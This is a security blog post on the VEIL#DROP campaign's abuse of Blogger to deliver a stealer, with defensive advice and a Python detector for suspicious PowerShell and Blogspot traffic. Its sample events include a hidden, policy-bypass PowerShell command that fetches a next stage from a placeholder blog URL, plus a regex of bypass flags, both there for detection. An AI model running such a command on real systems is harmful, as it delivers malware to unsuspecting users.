Awareness Lessons
4 days ago

VEIL#DROP Abuses Google Blogger to Deliver PureLogs Stealer via Social Engineering

The VEIL#DROP campaign abuses trusted cloud infrastructure, specifically Google's Blogger platform, to host and deliver malicious payloads, sidestepping domain-reputation and network-based defenses that trust Google-owned domains. The attack chain begins with a socially engineered JavaScript file that launches PowerShell with execution-policy bypass flags, a reminder that user interaction with untrusted files remains a critical entry point. By blending malicious traffic with legitimate Google service communications, the attackers make detection significantly harder for traditional security tools. This matters because even well-defended organizations may allowlist traffic to Google's infrastructure wholesale, creating a blind spot that sophisticated threat actors actively exploit.

Tactical Insight

Immediate actions

  • Alert in endpoint security tooling on any PowerShell launch that carries execution-policy bypass flags (e.g., `-ExecutionPolicy Bypass`). The execution policy itself is not a security boundary and is trivially bypassed from the command line, so treat the flag as a detection signal and rely on application control, not the policy setting, for prevention.
  • Apply application control policies (AppLocker or WDAC) so that the Windows Script Host (`wscript.exe`, `cscript.exe`) cannot run JavaScript files from user-writable locations; a downloaded `.js` lure should have no runtime outside a sanctioned browser or an explicitly approved interpreter.
  • Review proxy and firewall rules so that outbound requests to blogging platforms and generic cloud hosting services are inspected and logged rather than allowlisted by domain, and look for script-like or encoded content returned from pages on those services.

Long-term improvements

  • Implement a security awareness training program that specifically covers social engineering lures delivered as JavaScript and similar script files rather than only Office documents, since a double-clicked `.js` runs immediately under the Windows Script Host.
  • Enforce the principle of least privilege so that a compromised standard user account gains as little as possible: no local administrator rights, and PowerShell for standard users restricted through application control or Constrained Language Mode, because the execution policy alone does not stop a user, or malware running as that user, from downloading and executing remote payloads.
  • Develop and maintain an approved-applications allowlist so that unapproved scripting runtimes and interpreters cannot run on endpoints, and review it when a new interpreter appears in process telemetry.

Detection measures

  • Deploy SIEM rules that correlate process-creation telemetry (PowerShell spawned by a script host, browser, or email client, especially with bypass flags) with subsequent outbound HTTP/S connections from that same process to cloud blogging domains within a short window.
  • Enable PowerShell script-block logging (Event ID 4104) and transcription logging on all endpoints and forward the logs to a centralized SIEM for real-time alerting; script-block logs capture the de-obfuscated code even when the command line is encoded.
  • Use DNS filtering to flag or block resolutions of known content-hosting platforms, and pair it with EDR network telemetry that records the initiating process, since DNS filtering on its own cannot tell whether a query came from a browser or from a script host or PowerShell.
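
The following Python is an added example, not code from the original lesson or from the campaign's reporting. It implements the bypass-flag alert from the immediate actions and the process-to-egress correlation from the detection measures over constructed Sysmon-style events (EventID 1 = process create, EventID 3 = network connection). The field names follow Sysmon's schema, but every value (paths, GUIDs, host names, command lines, timestamps) is invented for the example.

```python
"""Correlate suspicious PowerShell starts with follow-on Blogger/Blogspot egress.

Added example. SAMPLE_EVENTS are constructed Sysmon-style records; field names
follow Sysmon's schema, every value is invented.
"""
import re
from datetime import datetime, timedelta

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Parents that should rarely spawn PowerShell: Windows Script Host (how a
# double-clicked .js runs), the mail client, and browsers.
SUSPICIOUS_PARENTS = {"wscript.exe", "cscript.exe", "outlook.exe",
                      "chrome.exe", "msedge.exe", "firefox.exe"}

# PowerShell switches that evade policy or visibility, including short forms.
BYPASS_FLAG_RE = re.compile(
    r"-(?:ep|exec|executionpolicy)\s+bypass"
    r"|-nop\b|-noprofile\b"
    r"|-(?:w|windowstyle)\s+hidden"
    r"|-(?:enc|encodedcommand)\s+\S+",
    re.IGNORECASE,
)

# Google blogging hosts: the apex domain or any subdomain of it.
BLOG_HOST_RE = re.compile(r"(?:^|\.)(?:blogger\.com|blogspot\.com)$", re.IGNORECASE)

# A network event this long after the process start still counts as related.
CORRELATION_WINDOW = timedelta(minutes=5)

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _evt(event_id, utc_time, guid, image, **fields):
    return {"EventID": event_id, "UtcTime": utc_time,
            "ProcessGuid": guid, "Image": image, **fields}


# Constructed sample telemetry (not from a real host).
SAMPLE_EVENTS = [
    # Benign: PowerShell opened from the shell, no flags, expected egress.
    _evt(1, "2024-05-01 09:00:00", "{G1}", PS_PATH,
         ParentImage=r"C:\Windows\explorer.exe", CommandLine="powershell.exe"),
    _evt(3, "2024-05-01 09:00:03", "{G1}", PS_PATH,
         DestinationHostname="www.powershellgallery.com", DestinationPort=443),
    # Benign: a browser reading a blog is normal traffic and is never a candidate.
    _evt(3, "2024-05-01 09:01:10", "{G2}",
         r"C:\Program Files\Google\Chrome\Application\chrome.exe",
         DestinationHostname="example.blogspot.com", DestinationPort=443),
    # Suspicious: a .js lure run by Windows Script Host launches a hidden
    # PowerShell with an execution-policy bypass ...
    _evt(1, "2024-05-01 09:02:00", "{G3}", PS_PATH,
         ParentImage=r"C:\Windows\System32\wscript.exe",
         CommandLine='powershell.exe -nop -w hidden -ep bypass -c '
                     '"iwr https://example.blogspot.com/p/stage.html"'),
    # ... and seconds later fetches its next stage from a Blogspot page.
    _evt(3, "2024-05-01 09:02:04", "{G3}", PS_PATH,
         DestinationHostname="example.blogspot.com", DestinationPort=443),
    # Same process much later: outside the window, so not attached to the alert.
    _evt(3, "2024-05-01 09:30:00", "{G3}", PS_PATH,
         DestinationHostname="example.blogspot.com", DestinationPort=443),
    # Odd parent, but no bypass flags and no blog egress: lower severity.
    _evt(1, "2024-05-01 09:05:00", "{G4}", PS_PATH,
         ParentImage=r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
         CommandLine=r"powershell.exe -File C:\Users\alice\sync.ps1"),
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_suspicious_powershell(events):
    """Pass 1: PowerShell starts with an unexpected parent and/or bypass flags.
    Keyed on ProcessGuid, not PID: PIDs are reused, Sysmon GUIDs are not."""
    candidates = {}
    for e in events:
        if e["EventID"] != 1 or _basename(e["Image"]) not in POWERSHELL_IMAGES:
            continue
        parent = _basename(e["ParentImage"])
        flags = [m.lower() for m in BYPASS_FLAG_RE.findall(e["CommandLine"])]
        if parent in SUSPICIOUS_PARENTS or flags:
            candidates[e["ProcessGuid"]] = {
                "process_guid": e["ProcessGuid"], "started": _ts(e["UtcTime"]),
                "parent": parent, "flags": flags,
                "command_line": e["CommandLine"], "blog_egress": [],
            }
    return candidates


def correlate_blog_egress(events, candidates):
    """Pass 2: attach connections to Google blogging hosts made by a candidate
    process within CORRELATION_WINDOW of its start. Two passes, so the order
    of events in the input does not matter."""
    for e in events:
        c = candidates.get(e["ProcessGuid"])
        if e["EventID"] != 3 or c is None:
            continue
        age = _ts(e["UtcTime"]) - c["started"]
        if (timedelta(0) <= age <= CORRELATION_WINDOW
                and BLOG_HOST_RE.search(e["DestinationHostname"])):
            c["blog_egress"].append(e["DestinationHostname"])
    return candidates


def build_alerts(events):
    """High: suspicious start plus blog egress. Medium: suspicious start only."""
    alerts = list(correlate_blog_egress(events, find_suspicious_powershell(events)).values())
    for a in alerts:
        a["severity"] = "high" if a["blog_egress"] else "medium"
    return alerts


if __name__ == "__main__":
    for a in build_alerts(SAMPLE_EVENTS):
        print(f'{a["severity"]:6} {a["process_guid"]} parent={a["parent"]} '
              f'flags={a["flags"]} egress={a["blog_egress"]}')
```

Run stand-alone, the script reports one high-severity alert for the `wscript.exe` child (`{G3}`, three bypass flags, one in-window connection to `example.blogspot.com`) and one medium-severity alert for the Outlook child (`{G4}`). The browser's own visit to the same blog is not a candidate at all, which is the point of keying on the initiating process rather than on the destination domain: the domain is the same for the victim and for everyone else reading a blog.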